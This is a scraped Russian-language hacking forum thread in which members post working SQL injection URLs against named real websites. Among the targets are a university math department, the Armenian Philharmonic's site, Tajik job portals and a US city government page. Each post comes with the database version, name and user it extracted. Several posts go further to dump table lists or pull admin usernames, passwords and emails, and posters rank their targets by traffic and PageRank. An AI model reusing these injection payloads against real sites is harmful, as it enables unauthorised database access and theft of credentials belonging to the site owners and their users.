SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Трафф 3-4 К
    Code:
    http://www.auto-creditline.ru/sell_cat.php?cid=-1%27+union+select+1,2,3,4,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,6,7,8,9+--+
    autocre3_site@localhost:autocre3_credit:5.0.92-log
    Таблицы
    PHP:
    cr_vinfax    
    cr_users    
    cr_tariffs    
    cr_special    
    cr_sms_oss    
    cr_sms    
    cr_review_galery    
    cr_review_comment_galery    
    cr_review_comment    
    cr_review    
    cr_partners    
    cr_options    
    cr_news    
    cr_newcarmake    
    cr_newcardealer_model    
    cr_newcardealer_make    
    cr_newcardealer    
    cr_newcar_model    
    cr_kasko    
    cr_galery    
    cr_faq    
    cr_content    
    cr_color    
    cr_cities    
    cr_category    
    cr_cars    
    cr_banner2    
    cr_banner
    Содержимое cr_users
    PHP:
    login
    pwd
    master
    userid
    session
    P.S: Доступ в админку получите, но там будет облом :(
     
    1 person likes this.
  2. o'clock

    o'clock Elder - Старейшина

    Joined:
    16 May 2009
    Messages:
    125
    Likes Received:
    22
    Reputations:
    11
    Давно меня тут не было:(
    Code:
    http://www.dog-perm.ru/modules.php?name=pitomnik&pag=&num_page=1&region_id=48&poroda_num=0&order=union+select+1,concat_ws%28user%28%29,version%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20--
    User:[email protected]
    Version:4.1.22
    Database:dogpermru
    ТИЦ 140
     
  3. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    4.1.14:::tiranatimes:::ttimes@localhost
     
  4. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Зачем такие сложности? Там же не слепая скуля.
    Code:
    http://www.vmdaily.ru/showarticle.php?id=184843%27+and+1=3+union+select+1,table_name,3+FROM+information_schema.tables+--+
     
  5. tabletkO

    tabletkO Banned

    Joined:
    3 Nov 2011
    Messages:
    83
    Likes Received:
    20
    Reputations:
    11
    EDU =/

    Поддомен универа Indiana
    тИЦ 10, PR 6
    Code:
    http://www.math.indiana.[COLOR=Red]edu[/COLOR]/seminars/seminar.phtml?id=-1+union+all+select+database(),2,3,4,5,6,7--
    P.S. Раньше были опубликованы скульи, но на другом поддомене...
     
    1 person likes this.
  6. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Результат - редирект.
    ScriptDungeon.com
    Code:
    http://www.scriptdungeon.com/jump.php?ScriptID=134+and+1=21+union+select+1,2,3,concat_ws(0x3b,version(),database(),user()),5,6,7,8,9,10,11,12+--+
    Результат:
    Code:
    Перенаправление на:
    http://www.scriptdungeon.com/5.1.42;scriptdungeon;dboscriptupdate@localhost
    
     
  7. o'clock

    o'clock Elder - Старейшина

    Joined:
    16 May 2009
    Messages:
    125
    Likes Received:
    22
    Reputations:
    11
    Code:
    http://www.alienship.ru/index.php?type=ship&id=20
    [email protected]
    5.1.58-log
    wwwalienshipru
    :eek: хуnta
     
  8. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Alexa Rank 293,690 PR 4
    Code:
    http://www.dianzinet.com/buy/wnhtml.php ?sec=buycontact &id=99999999999+UNION+SELECT+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
    icadm@localhost:db_chinaicnet_com:5.0.77
    Code:
    http://www.dianzinet.com/buy/wnhtml.php ?sec=buycontact &id=99999999999+UNION+SELECT+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+information_schema.tables
    Code:
    http://www.dianzinet.com/buy/wnhtml.php ?sec=buycontact &id=99999999999+UNION+SELECT+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+information_schema.columns
     
    1 person likes this.
  9. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    HackZona.ru
    CY200 PR2


    concat_ws(0x3b,version(),database(),user())
    POST /hz.php?name=Search HTTP/1.1
    Тело запроса:
    Code:
    query=s&topic=26' AND 1=2 UNION SELECT 1,2,3,4,5,6,CONCAT_WS(0x3b,version(),database(),user()),8,9,10,11,12,13 # &category=0&author=123&days=7&type=stories
    
    Code:
    5.1.42;hz4647;hz4647@localhost
    
    Запрос там кстати очень интересный:
    Code:
    select s.sid, s.aid, s.informant, s.title, s.time, s.hometext, s.bodytext, s.counter, a.url, s.comments, s.topic, s.score, s.ratings from voov_stories s, voov_authors a where s.aid=a.aid AND (s.title LIKE '%s%' OR s.hometext LIKE '%s%' OR s.bodytext LIKE '%s%' OR s.notes LIKE '%s%') AND s.informant='123' AND s.topic='26[SQL INJ]' AND TO_DAYS(NOW()) - TO_DAYS(time) <= '7' ORDER BY s.time DESC LIMIT 0,10
    
    ;)
     
    #14289 Boolean, 7 Nov 2011
    Last edited: 7 Nov 2011
    8 people like this.
  10. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Лимит и вперёд
     
  11. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    было =/
    http://forum.antichat.ru/printthread.php?t=21336&page=6508&pp=1
     
  12. g0rm0n

    g0rm0n New Member

    Joined:
    18 Aug 2010
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    Code:
    http://www.enridan.com/place.php?id=8+union+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3,4,5,6,7,8--+
    4.0.27-log:enridandb:enridan@localhost
     
  13. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    The official site of the Armenian Philharmonic Orchestra
    тиЦ 40 PR 5

    Code:
    http://www.apo.am/index.php?content=1&id=9999999+union+select+1,2,3,4,5,6,7,8,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,10--
    apo_apo@localhost:apo_apo:5.0.92-community-log
    Code:
    http://www.apo.am/index.php?content=1&id=9999999+union+select+1,2,3,4,5,6,7,8,group_concat%28table_name%29,10+from+INFORMATION_SCHEMA.COLUMNS--
    PHP:
    admin
    apo_news
    artists
    attachments
    concerts
    gallery
    guest
    Интересная таблица "admin" :D
    Code:
    http://www.apo.am/index.php?content=1&id=9999999+union+select+1,2,3,4,5,6,7,8,concat_ws%28id,0x3a,email%29,10+FROM+admin--
    http://www.apo.am/phpinfo.php - Это без комментариев
     
    #14293 aydin-ka, 9 Nov 2011
    Last edited: 9 Nov 2011
  14. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    http://bgnevesta.com/hotornot/viewcomments.php?phid=0%20union%20select%201,username,3,password,5,6%20from%20admin--#

    PR 3
     
  15. maxim2142

    maxim2142 Member

    Joined:
    31 May 2010
    Messages:
    16
    Likes Received:
    10
    Reputations:
    3
    Новосибирский Государственный Технический Университет
    Code:
    http://inform.nstu.ru/index.php?type=mir&stat=617
    nginx/0.7.62
    PHP/5.2.17 ZendServer/5.0
    MySQL >=5
    inform@localhost
    5.0.77
    inform@localhost
    hosting.nstu.ru
    Data Bases: 	information_schema
    		inform
    		test
    
     
  16. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    http://www.gamer365.hu/profile.php?user_id=128+and+1=0+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,42,53,54,55+from+information_schema.tables%20limit%2043,1--
     
    1 person likes this.
  17. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    PR 5 ТИЦ 100

    http://www.bgiki.ru/news/more.php?id=-168+union+select+1,2,3,version()--

    version =5.1.41-log=
     
  18. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    За Русского и Эстонского пилота. Часть 1

    Site: joblist.tj
    Code:
    http://www.[B]joblist.tj[/B]/showvacancy.php?id=[COLOR=Red]-[/COLOR]1478[B][COLOR=Red]+union+Select+1,concat_ws(version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+[/COLOR][/B]
    version: 5.0.91-community-log
    database: develop_joblisttj
    user: develop_ns@localhost

    + Уязвимый параметр:
    Code:
    /index.php?[COLOR=Red][B]catid[/B][/COLOR]=11'[B]SQL-Injection[/B]'
    database found:
    Code:
    develop_aboutsa
    develop_agromoldova
    develop_apartments
    develop_aport
    develop_artishock
    develop_blog
    develop_bulgaria
    develop_cbs
    develop_cimul
    develop_ctv
    develop_decoretto
    develop_developweb
    develop_egypt
    develop_elena
    develop_joblisttj
    develop_kitchen
    develop_livetravelhelp
    develop_moldovapiese
    develop_mykupe
    develop_nikitablog
    develop_ritus
    develop_rusnac
    develop_rybak
    develop_rybakforum
    develop_turkey
    develop_turkeys
    develop_vesco
    develop_worldofmoldova
    [COLOR=Red][B]develop_za[/B] [/COLOR][I](Самая интересная)[/I]
    Site: baza.kob.tj
    Code:
    http://baza.kob.tj/?a=orgtype&id=[B][COLOR=Red]-[/COLOR][/B]45[B][COLOR=Red]+union+select+concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,2,3+--+[/COLOR][/B]
    version: 5.0.92-community
    database: kobtj_db
    user: kobtj_dbuser@localhost

    Site: person.tj

    Code:
    http://www.person.tj/index.php?id=[COLOR=Red][B]-[/B][/COLOR]938[COLOR=Red][B]+union+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29+--+[/B][/COLOR]
    version: 4.1.25
    database: person
    user: user@localhost

    Site: dictionary.tj
    Code:
    http://dictionary.tj/finance/index.php?id=[COLOR=Red]-[/COLOR]1012[COLOR=Red][B]+union+select+1,concat_ws(0x3a,version(),database(),user())+--+[/B][/COLOR]
    version: 4.1.25
    database: base
    user: user@localhost
     
    1 person likes this.
  19. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    914
    Reputations:
    363
    4.0.30-max-log
     
    _________________________
    1 person likes this.
  20. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    919
    Reputations:
    862
    Немного американщины =/

    Site:adenamontessori.us

    PR=2

    Inject
    Code:
    _ttp://adenamontessori.us/product.php?cid=4[COLOR=Magenta]+and+substring((@@version),1,1)=4[/COLOR] 
    Version:4.1.24-max-log
    Database:josephbiz
    User:[email protected]

    -----------------------------------------------------
    -----------------------------------------------------

    Site:www.ci.bartlesville.ok.us

    PR=5


    Inject
    Code:
    _ttp://www.ci.bartlesville.ok.us/category.php?cat=1041[COLOR=Magenta]+and+substring((@@version),1,1)=4[/COLOR]
    Version:4.0.30-max-log
    Database:pendergraphics
    User:[email protected]

    -----------------------------------------------------
    -----------------------------------------------------

    Site:www.simcom.us

    PR=2


    Inject
    Code:
     _ttp://www.simcom.us/product_detail.php?cid=1&pid=14[COLOR=Magenta]+and+1=2+union+select+1,2,version(),database(),user(),6,7,8,9,10,11,12,13,14,15[/COLOR]
    Version:4.0.27-max-log
    Database:db295004332
    User:[email protected]
     
    _________________________
    2 people like this.
Thread Status:
Not open for further replies.